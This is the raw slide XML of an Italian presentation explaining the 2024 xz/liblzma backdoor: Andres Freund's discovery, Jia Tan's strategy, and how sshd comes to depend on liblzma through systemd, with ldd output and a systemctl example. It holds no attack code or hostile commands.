              <a:rPr lang="it-IT" sz="1600" err="1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lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="160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/x86_64-linux-gnu/liblz4.so.1 (0x00007f9519988000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="160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        libcap.so.2 =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1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lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="160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/x86_64-linux-gnu/libcap.so.2 (0x00007f951997d000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="160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        libgcrypt.so.20 =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1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lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="160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/x86_64-linux-gnu/libgcrypt.so.20 (0x00007f951983f000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="160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        libc.so.6 =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1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lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="160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/x86_64-linux-gnu/libc.so.6 (0x00007f9519600000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="160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        /lib64/ld-linux-x86-64.so.2 (0x00007f9519b93000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="160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        libgpg-error.so.0 =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1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lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="160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/x86_64-linux-gnu/libgpg-error.so.0 (0x00007f95195da000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin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18369545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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10512832" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t>  sommario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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="CasellaDiTesto 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A27160-7963-656C-9FB1-68F8080C23CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198904" y="1792941"/>
            <a:ext cx="8634131" cy="48320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514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La scoperta di Andres Freund</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Tan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Struttura della backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Forme di mitigazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Cosa sappiamo oggi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30146226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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1948474"/>
            <a:ext cx="11866844" cy="38472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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>SSH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>In diversi sistemi Linux, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> può essere integrato con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> come servizio, con relativa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>unit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> ".service". Si utilizza infatti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>(la utility CLI per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>) per controllare tale servizio, esempio per startup:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sshd.service</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>unit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> ".service" usano diverse funzioni (ad es. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sd_notify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sd_journal_printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> ) di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>libsystemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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7022429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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1948474"/>
            <a:ext cx="11866844" cy="38472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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>SSH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Nelle giuste condizioni, è quindi possibile una dipendenza indiretta tra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Quindi, ricapitolando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
